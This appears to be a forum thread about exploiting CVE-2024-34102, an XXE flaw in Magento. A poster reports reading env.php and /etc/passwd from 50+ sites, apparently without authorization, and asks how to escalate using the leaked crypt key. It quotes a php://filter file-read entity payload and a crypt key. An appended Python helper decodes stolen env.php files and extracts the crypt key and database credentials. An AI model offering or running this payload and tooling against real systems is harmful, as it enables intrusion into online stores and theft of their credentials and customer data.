
CVE-2024-34102

MrMischief

I have 50+ sites on which I have tested this CVE.
I can get the env.php files at a minimum. I will be dirbusting them to check for phpmyadmin and such.
Any other ways I can gain access from this?

I have used a script like that to test it and get files back; I have tested each site. But once I get, say, the env.php file, what do I do then to get more access?
I have tested it to get the /etc/password and ../app/etc/env.php files. But then what with the crypt key?

So basically this CVE is an XXE exploit: in case there is a vulnerable XML, you can use it for server-side requests, but it wouldn't break crypt keys or anything else.
What do you need exactly, finding crypto keys or breaking them?
So the vulnerability leads to LFI.

XML:
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource={FILE}">
....


So when I do, say, ../app/etc/env.php, it will contain this key:

PHP:
'crypt' => array (
    'key' => 'ea3c765b042b9e0460c882849bf80a1d',
  ),

Can I then use this key in any way to get access, or anything? Or are there any other important files I can get using it?
This is the default env.php file layout.
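Added example, not code posted by anyone in this thread: a small Python helper for the read-back step the posts describe, i.e. reversing the php://filter/convert.base64-encode wrapper and pulling the crypt/key and db/connection values out of an env.php. The sample env.php is constructed for the example (only the key value is the one quoted above); the entity template is the one shown in the XML block; the 32-hex-character check merely matches the key shape shown in the post and says nothing about how the key is used.

```python
import base64
import re

# The payload line quoted in the thread: an external-DTD parameter entity that
# makes the XML parser read {FILE} through PHP's base64 stream filter, so the
# file body comes back as one base64 string instead of raw PHP that the parser
# would choke on.
def build_file_entity(path: str) -> str:
    return f'<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource={path}">'


# Constructed sample env.php (assumption: not copied from any real store). The
# crypt key value is the one quoted in the post above; everything else is made up.
SAMPLE_ENV_PHP = """<?php
return [
    'backend' => [
        'frontName' => 'admin'
    ],
    'crypt' => [
        'key' => 'ea3c765b042b9e0460c882849bf80a1d'
    ],
    'db' => [
        'table_prefix' => '',
        'connection' => [
            'default' => [
                'host' => 'db.internal',
                'dbname' => 'magento',
                'username' => 'magento',
                'password' => 'hunter2',
                'active' => '1'
            ]
        ]
    ],
    'MAGE_MODE' => 'production'
];
"""

# What the base64 filter would hand back for that file (constructed, not captured).
SAMPLE_FILTER_OUTPUT = base64.b64encode(SAMPLE_ENV_PHP.encode()).decode()


def decode_filter_output(blob: str) -> str:
    """Reverse php://filter/convert.base64-encode.

    The blob may arrive wrapped in other text, so strip whitespace and re-pad
    before decoding; validate=True rejects anything that is not base64 (for
    example an error page returned instead of the file).
    """
    cleaned = re.sub(r"\s+", "", blob)
    cleaned += "=" * (-len(cleaned) % 4)
    return base64.b64decode(cleaned, validate=True).decode("utf-8", errors="replace")


def extract_crypt_key(env_php: str):
    """Pull crypt/key out of env.php text.

    env.php is written either with array(...) (as in the post) or with short
    [...] syntax, so accept both; return None when the section is absent.
    """
    m = re.search(
        r"'crypt'\s*=>\s*(?:array\s*\(|\[)\s*'key'\s*=>\s*'([^']*)'",
        env_php,
    )
    return m.group(1) if m else None


def extract_db_connection(env_php: str) -> dict:
    """Pull host/dbname/username/password from the db/connection block.

    This is the other thing env.php gives away, and it is what the phpmyadmin
    dirbusting mentioned in the thread would be paired with.
    """
    start = env_php.find("'connection'")
    if start == -1:
        return {}
    section = env_php[start:]
    out = {}
    for field in ("host", "dbname", "username", "password"):
        m = re.search(rf"'{field}'\s*=>\s*'([^']*)'", section)
        if m:
            out[field] = m.group(1)
    return out


def is_legacy_hex_key(key: str) -> bool:
    """True for the 32-lowercase-hex-character key shape shown in the post."""
    return re.fullmatch(r"[0-9a-f]{32}", key) is not None


def summarize(blob: str) -> dict:
    """Decode one php://filter response and report what the env.php leaks."""
    text = decode_filter_output(blob)
    key = extract_crypt_key(text)
    return {
        "crypt_key": key,
        "legacy_hex_key": bool(key) and is_legacy_hex_key(key),
        "db": extract_db_connection(text),
    }


if __name__ == "__main__":
    print(build_file_entity("../app/etc/env.php"))
    print(summarize(SAMPLE_FILTER_OUTPUT))
```

The regexes are deliberately loose about whitespace because env.php is generated by PHP's var_export-style writer and the exact layout differs between Magento versions; if decode_filter_output raises on bad base64, the response was not the file (a blocked request or an error page), which is the first thing to check before assuming the target is unaffected.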